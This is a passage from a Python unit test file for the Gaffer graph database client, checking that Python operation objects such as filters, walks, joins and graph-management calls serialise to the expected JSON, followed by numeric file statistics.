"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
}
},
"globalEntities": {
"predicates": [
{
"selection": [
"timestamp"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value": 1,
"orEqualTo": true
}
}
]
},
"entities": {
"entity1": {
"predicates": [
{
"selection": [
"prop"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
},
"entity2": {
"predicates": [
{
"selection": [
"prop"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
}
},
"globalEdges": {
"predicates": [
{
"selection": [
"count"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value": 2,
"orEqualTo": false
}
}
]
}
}
''',
g.Filter(
global_edges=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["count"],
predicate=g.IsMoreThan(
value=2,
or_equal_to=False
)
)
]
),
global_entities=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["timestamp"],
predicate=g.IsMoreThan(
value=1,
or_equal_to=True
)
)
]
),
global_elements=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["timestamp"],
predicate=g.IsMoreThan(
value=1,
or_equal_to=True
)
),
g.PredicateContext(
selection=["timestamp"],
predicate=g.IsLessThan(
value=10,
or_equal_to=True
)
)
]
),
entities=[
g.ElementFilterDefinition(
group="entity1",
predicates=[
g.PredicateContext(
selection=["prop"],
predicate=g.Regex(
value="a.*"
)
)
]
),
g.ElementFilterDefinition(
group="entity2",
predicates=[
g.PredicateContext(
selection=["prop"],
predicate=g.Regex(
value="a.*"
)
)
]
)
],
edges=[
g.ElementFilterDefinition(
group="edge1",
predicates=[
g.PredicateContext(
selection=["prop2"],
predicate=g.Regex(
value="a.*"
)
)
]
),
g.ElementFilterDefinition(
group="edge2",
predicates=[
g.PredicateContext(
selection=["prop2"],
predicate=g.Regex(
value="a.*"
)
)
]
)
]
)
],
[
'''
{
"operations": [
{
"jobId": "job1",
"class": "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults"
},
{
"edges": {
"edge2": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop2"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
}
},
"edge1": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop2"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
}
}
},
"entities": {
"entity1": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
}
},
"entity2": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
},
"groupBy": [
"timestamp"
]
}
},
"class": "uk.gov.gchq.gaffer.operation.impl.function.Aggregate"
}
],
"class": "uk.gov.gchq.gaffer.operation.OperationChain"
}
''',
g.OperationChain(
operations=[
g.GetJobResults(
job_id="job1"
),
g.Aggregate(
entities=[
g.AggregatePair(
group="entity1",
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
),
g.AggregatePair(
group="entity2",
group_by=[
"timestamp"
],
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
)
],
edges=[
g.AggregatePair(
group="edge1",
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop2"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
),
g.AggregatePair(
group="edge2",
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop2"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
)
]
)
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [
{
"class": "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults",
"jobId": "job1"
},
{
"class": "uk.gov.gchq.gaffer.operation.impl.function.Transform",
"edges": {
"edge1": {
"functions": [
{
"selection": [
"prop2"
],
"projection": [
"newProp2"
],
"function": {
"class": "exampleFunction"
}
}
]
},
"edge2": {
"functions": [
{
"selection": [
"prop2"
],
"projection": [
"newProp2"
],
"function": {
"class": "exampleFunction"
}
}
]
}
},
"entities": {
"entity1": {
"functions": [
{
"selection": [
"prop"
],
"projection": [
"newProp"
],
"function": {
"class": "exampleFunction"
}
}
]
},
"entity2": {
"functions": [
{
"selection": [
"prop"
],
"projection": [
"newProp"
],
"function": {
"class": "exampleFunction"
}
}
]
}
}
}
]
}
''',
g.OperationChain(
operations=[
g.GetJobResults(
job_id="job1"
),
g.Transform(
entities=[
g.ElementTransformDefinition(
group="entity1",
functions=[
g.FunctionContext(
selection=["prop"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp"]
)
]
),
g.ElementTransformDefinition(
group="entity2",
functions=[
g.FunctionContext(
selection=["prop"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp"]
)
]
)
],
edges=[
g.ElementTransformDefinition(
group="edge1",
functions=[
g.FunctionContext(
selection=["prop2"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp2"]
)
]
),
g.ElementTransformDefinition(
group="edge2",
functions=[
g.FunctionContext(
selection=["prop2"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp2"]
)
]
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ScoreOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}, {
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "namedOp"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
}
''',
g.ScoreOperationChain(
operation_chain=g.OperationChain(
operations=[
g.GetElements(),
g.NamedOperation(
operation_name='namedOp'
),
g.Limit(
truncate=True,
result_limit=3
)
]
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ScoreOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}, {
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "namedOp"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
}
''',
g.ScoreOperationChain(
operation_chain={
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}, {
"class": "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName": "namedOp"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit": 3,
"truncate": True
}]
}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.GetWalks",
"resultsLimit": 500000,
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 1
}],
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 2
}]
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 4
}]
}]
}]
}
''',
g.OperationChain(
operations=[
g.GetWalks(
results_limit=500000,
input=[
g.EntitySeed(
vertex=1
)
],
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
]
),
g.GetElements(
input=[
g.EntitySeed(
vertex=4
)
]
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.GetWalks",
"operations" : [
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"BasicEdge" : {
"properties" : [ "count" ]
}
},
"entities" : { }
},
"directedType" : "DIRECTED",
"includeIncomingOutGoing" : "OUTGOING"
},
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"BasicEntity" : {
"postAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 3
},
"selection" : [ "property1" ]
} ]
}
}
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"BasicEdge" : {
"properties" : [ "count" ]
}
},
"entities" : { }
},
"directedType" : "DIRECTED",
"includeIncomingOutGoing" : "OUTGOING"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"BasicEntity" : {
"postAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 3
},
"selection" : [ "property1" ]
} ]
}
}
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"BasicEdge" : {
"properties" : [ "count" ]
}
},
"entities" : { }
},
"directedType" : "DIRECTED",
"includeIncomingOutGoing" : "OUTGOING"
} ]
} ],
"resultsLimit" : 1000000,
"input" : [ {
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : "A"
} ]
}
''',
g.GetWalks(
results_limit=1000000,
operations=[
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
properties=[
"count"
],
group="BasicEdge"
)
]
),
directed_type="DIRECTED",
include_incoming_out_going="OUTGOING"
),
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
g.ElementDefinition(
post_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"property1"
],
predicate=g.IsLessThan(
or_equal_to=False,
value=3
)
)
],
group="BasicEntity"
)
],
edges=[
]
)
),
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
properties=[
"count"
],
group="BasicEdge"
)
]
),
directed_type="DIRECTED",
include_incoming_out_going="OUTGOING"
)
]
),
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
g.ElementDefinition(
post_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"property1"
],
predicate=g.IsLessThan(
or_equal_to=False,
value=3
)
)
],
group="BasicEntity"
)
],
edges=[
]
)
),
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
properties=[
"count"
],
group="BasicEdge"
)
]
),
directed_type="DIRECTED",
include_incoming_out_going="OUTGOING"
)
]
)
],
input=[
g.EntitySeed(
vertex="A"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
},
{
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
}
]
}
],
"options": {
"key1": "value1"
}
}
''',
g.OperationChain(
operations=[
g.OperationChain(
operations=[
g.GetElements(),
g.Limit(result_limit=3, truncate=True)
]
)
],
options={"key1": "value1"}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.store.operation.GetSchema",
"compact": true
}
''',
g.GetSchema(
compact=True
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.GetWalks",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view": {
"edges": {
"JunctionLocatedAt": {}
},
"entities": {}
}
},
{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view": {
"edges": {
"RoadUse": {}
},
"entities": {}
}
}
],
"resultsLimit": 10000,
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 293020
}]
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.Map",
"functions": [{
"class": "uk.gov.gchq.koryphe.impl.function.IterableFunction",
"functions": [{
"class": "uk.gov.gchq.gaffer.data.graph.function.walk.ExtractWalkEdgesFromHop",
"hop": 1
}, {
"class": "uk.gov.gchq.koryphe.impl.function.FirstItem"
}]
}]
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"useMatchedVertex": "EQUAL",
"edgeVertices": "SOURCE"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
}]
}
''',
g.OperationChain(
operations=[
g.GetWalks(
results_limit=10000,
input=[
g.EntitySeed(
vertex=293020
)
],
operations=[
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="JunctionLocatedAt"
)
],
entities=[]
)
),
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="RoadUse"
)
],
entities=[]
)
)
]
),
g.Map(
functions=[
g.IterableFunction(
functions=[
g.ExtractWalkEdgesFromHop(
hop=1),
g.FirstItem()
]
)
]
),
g.ToVertices(
use_matched_vertex="EQUAL",
edge_vertices="SOURCE"
),
g.ToSet()
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.SplitStoreFromFile",
"inputPath": "path/to/file"
}
''',
g.SplitStoreFromFile(
input_path="path/to/file"
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.SplitStoreFromIterable",
"input": [
"1", "2", "3"
]
}
''',
g.SplitStoreFromIterable(
input=[
"1", "2", "3"
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.SampleElementsForSplitPoints",
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ],
"numSplits": 5,
"proportionToSample": 0.1
}
''',
g.SampleElementsForSplitPoints(
input=[
g.Entity(
vertex=6,
properties={'count': 1},
group="entity"
),
g.Edge(
destination=6,
source=5,
group="edge",
properties={'count': 1},
directed=True
)
],
num_splits=5,
proportion_to_sample=0.1
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.If",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Entity",
"group" : "entity",
"vertex" : "a1",
"properties" : {
"count" : 5
}
}],
"conditional" : {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value" : 3,
"orEqualTo" : true
},
"transform" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.Map",
"functions" : [
{
"class" : "uk.gov.gchq.gaffer.data.element.function.ExtractProperty",
"name" : "count"
}
]
}
},
"then" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds"
},
"otherwise" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}
}
''',
g.If(
input=g.Entity(
group='entity',
vertex='a1',
properties={
'count': 5
}
),
conditional=g.Conditional(
predicate=g.IsMoreThan(
value=3,
or_equal_to=True
),
transform=g.Map(
functions=[
g.ExtractProperty(
name='count'
)
]
)
),
then=g.GetAdjacentIds(),
otherwise=g.GetAllElements()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.view.AddNamedView",
"name" : "testNamedView",
"description" : "example test NamedView",
"view" : {
"edges" : {
"testEdge" : { }
}
},
"overwriteFlag" : true,
"writeAccessRoles" : [ "auth1", "auth2" ]
}
''',
g.AddNamedView(
name='testNamedView',
description='example test NamedView',
view=g.View(
edges=[
g.ElementDefinition(
group='testEdge'
)]
),
overwrite_flag=True,
write_access_roles=['auth1', 'auth2']
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.view.AddNamedView",
"view" : {
"edges" : {
"testEdge" : {
"preAggregationFilterFunctions" : [ {
"selection" : [ "count" ],
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value" : "${countThreshold}"
}
} ]
}
}
},
"name" : "isMoreThan",
"description" : "is more than",
"parameters" : {
"countThreshold" : {
"valueClass" : "Long",
"required" : false,
"description" : "count threshold",
"defaultValue" : 1
}
},
"overwriteFlag" : true,
"writeAccessRoles" : [ "auth1", "auth2" ]
}
''',
g.AddNamedView(
name='isMoreThan',
description='is more than',
view=g.View(
edges=[
g.ElementDefinition(
group='testEdge',
pre_aggregation_filter_functions=[
g.PredicateContext(
selection='count',
predicate=g.IsMoreThan(
value="${countThreshold}"
)
)
]
)]
),
parameters=[
g.NamedViewParameter(
name="countThreshold",
description="count threshold",
default_value=1,
value_class="Long",
required=False
)
],
overwrite_flag=True,
write_access_roles=['auth1', 'auth2']
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.RemoveGraph",
"graphId" : "graph1"
}
''',
g.RemoveGraph(
graph_id="graph1"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.GetAllGraphIds"
}
''',
g.GetAllGraphIds()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.GetAllGraphInfo"
}
''',
g.GetAllGraphInfo()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.AddGraph",
"graphId" : "graph1",
"isPublic" : false,
"schema" : {
"edges" : {
"RoadHasJunction" : {
"description" : "A directed edge from each road to all the junctions on that road.",
"source" : "road",
"destination" : "junction",
"directed" : "true",
"properties" : { },
"groupBy" : [ ]
}
},
"types" : {
"junction" : {
"description" : "A road junction represented by a String.",
"class" : "String"
},
"road" : {
"description" : "A road represented by a String.",
"class" : "String"
}
}
},
"storeProperties" : {
"gaffer.store.class" : "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class" : "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
}
}
''',
g.AddGraph(
graph_id="graph1",
is_public=False,
schema={
"edges": {
"RoadHasJunction": {
"description": "A directed edge from each road to all the junctions on that road.",
"source": "road",
"destination": "junction",
"directed": "true",
"properties": {},
"groupBy": []
}
},
"types": {
"junction": {
"description": "A road junction represented by a String.",
"class": "String"
},
"road": {
"description": "A road represented by a String.",
"class": "String"
}
}
},
store_properties={
"gaffer.store.class": "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class": "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.AddGraphWithHooks",
"graphId" : "graph1",
"isPublic" : false,
"schema" : {
"edges" : {
"RoadHasJunction" : {
"description" : "A directed edge from each road to all the junctions on that road.",
"source" : "road",
"destination" : "junction",
"directed" : "true",
"properties" : { },
"groupBy" : [ ]
}
},
"types" : {
"junction" : {
"description" : "A road junction represented by a String.",
"class" : "String"
},
"road" : {
"description" : "A road represented by a String.",
"class" : "String"
}
}
},
"storeProperties" : {
"gaffer.store.class" : "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class" : "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
},
"hooks": [
{
"class": "uk.gov.gchq.gaffer.graph.hook.Log4jLogger"
}
]
}
''',
g.AddGraphWithHooks(
graph_id="graph1",
is_public=False,
schema={
"edges": {
"RoadHasJunction": {
"description": "A directed edge from each road to all the junctions on that road.",
"source": "road",
"destination": "junction",
"directed": "true",
"properties": {},
"groupBy": []
}
},
"types": {
"junction": {
"description": "A road junction represented by a String.",
"class": "String"
},
"road": {
"description": "A road represented by a String.",
"class": "String"
}
}
},
store_properties={
"gaffer.store.class": "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class": "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
},
hooks=[{
"class": "uk.gov.gchq.gaffer.graph.hook.Log4jLogger"
}]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.federatedstore.operation.ChangeGraphAccess",
"graphId": "example_graph_id",
"graphAuths": ["Auth_1", "Auth_2"],
"ownerUserId": "example_user_id",
"isPublic": true,
"disabledByDefault": false
}
''',
g.ChangeGraphAccess(
graph_id="example_graph_id",
graph_auths=["Auth_1", "Auth_2"],
owner_user_id="example_user_id",
is_public=True,
disabled_by_default=False
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.While",
"maxRepeats" : 5,
"input" : [
{
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : 2
}
],
"condition" : true,
"operation" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds"
}
}
''',
g.While(
max_repeats=5,
input=[
g.EntitySeed(
vertex=2
)
],
condition=True,
operation=g.GetAdjacentIds()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.While",
"maxRepeats" : 10,
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}],
"conditional" : {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value" : 2
},
"transform" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.Map",
"functions" : [{
"class" : "uk.gov.gchq.gaffer.data.element.function.ExtractProperty",
"name" : "count"
}
]
}
},
"operation" : {"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"}
}
''',
g.While(
max_repeats=10,
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
],
conditional=g.Conditional(
predicate=g.IsMoreThan(
value=2
),
transform=g.Map(
functions=[
g.ExtractProperty(
name="count"
)
]
)
),
operation=g.GetElements()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.store.operation.GetTraits",
"currentTraits" : true
}
''',
g.GetTraits(
current_traits=True
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.Reduce",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}],
"aggregateFunction": {
"class": "uk.gov.gchq.koryphe.impl.binaryoperator.Max"
},
"identity": 10
}
''',
g.Reduce(
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
],
aggregate_function=g.BinaryOperator(
class_name="uk.gov.gchq.koryphe.impl.binaryoperator.Max"
),
identity=10
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ForEach",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}],
"operation": {"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"}
}
''',
g.ForEach(
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
],
operation=g.GetElements()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSingletonList",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}]
}
''',
g.ToSingletonList(
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ValidateOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
} ]
},
"options" : {
"key" : "value"
}
}
''',
g.ValidateOperationChain(
operation_chain=g.OperationChain(
operations=[
g.AddElements(),
g.GetElements()
]
),
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ValidateOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
} ]
},
"options" : {
"key" : "value"
}
}
''',
g.ValidateOperationChain(
operation_chain={
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}]
},
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.SetVariable",
"input" : "testVal",
"variableName" : "testVarName",
"options" : {
"key" : "value"
}
}
''',
g.SetVariable(
input="testVal",
variable_name="testVarName",
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.GetVariable",
"variableName" : "testVarName",
"options" : {
"key" : "value"
}
}
''',
g.GetVariable(
variable_name="testVarName",
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.GetVariables",
"variableNames" : ["testVarName", "testVarName2"],
"options" : {
"key" : "value"
}
}
''',
g.GetVariables(
variable_names=["testVarName", "testVarName2"],
options={
"key": "value"
}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.join.Join",
"input": [ "test2" ],
"operation": {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [
{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": "test"
}
]
},
"matchMethod": {
"class": "uk.gov.gchq.gaffer.store.operation.handler.join.match.ElementMatch"
},
"flatten": false,
"joinType": "INNER",
"collectionLimit": 10
}
''',
g.Join(
input=['test2'],
operation=g.GetElements(input=[g.EntitySeed('test')]),
match_method=g.ElementMatch(),
flatten=False,
join_type=g.JoinType.INNER,
collection_limit=10)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.FederatedOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
} ]
},
"options" : {
"key" : "value"
}
}
''',
g.FederatedOperationChain(
operation_chain={
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}]
},
options={
"key": "value"
}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.join.Join",
"input": [ "test2" ],
"operation": {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [
{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": "test"
}
]
},
"matchMethod": {
"class": "uk.gov.gchq.gaffer.store.operation.handler.join.match.KeyFunctionMatch",
"firstKeyFunction": {
"class": "uk.gov.gchq.gaffer.data.element.function.ExtractId",
"id": "DESTINATION"
}
},
"matchKey": "RIGHT",
"flatten": false,
"joinType": "OUTER"
}
''',
g.Join(
input=['test2'],
operation=g.GetElements(input=[g.EntitySeed('test')]),
match_method=g.KeyFunctionMatch(first_key_function=g.ExtractId("DESTINATION")),
match_key=g.MatchKey.RIGHT,
flatten=False,
join_type=g.JoinType.OUTER)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.job.CancelScheduledJob",
"jobId": "238492-2ad-fadf034-324-2a"
}
''',
g.CancelScheduledJob(job_id="238492-2ad-fadf034-324-2a")
]
]
def test_operations(self):
self.maxDiff = None
for example in self.examples:
self.assertEqual(
json.loads(example[0]),
example[1].to_json(),
"json failed: \n" + example[0] + "\n" + example[
1].to_json_pretty_str()
)
g.JsonConverter.from_json(example[0], validate=True)
def test_get_elements_should_handle_single_inputs(self):
self.assertEqual(
{
'class': 'uk.gov.gchq.gaffer.operation.impl.get.GetElements',
'input': [
{
'class': 'uk.gov.gchq.gaffer.operation.data.EntitySeed',
'vertex': 'value'
}
]
},
g.GetElements(input="value").to_json())
if __name__ == "__main__":
unittest.main()
| 36.948862
| 124
| 0.299456
| 9,675
| 197,972
| 6.088165
| 0.056744
| 0.043716
| 0.078689
| 0.118364
| 0.89133
| 0.874743
| 0.85943
| 0.828634
| 0.787889
| 0.764307
| 0
| 0.009994
| 0.602227
| 197,972
| 5,357
| 125
| 36.955759
| 0.738
| 0.002814
| 0
| 0.623794
| 0
| 0
| 0.066957
| 0.027585
| 0
| 0
| 0
| 0
| 0.000715
| 1
| 0.000715
| false
| 0.000357
| 0.001072
| 0
| 0.002501
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
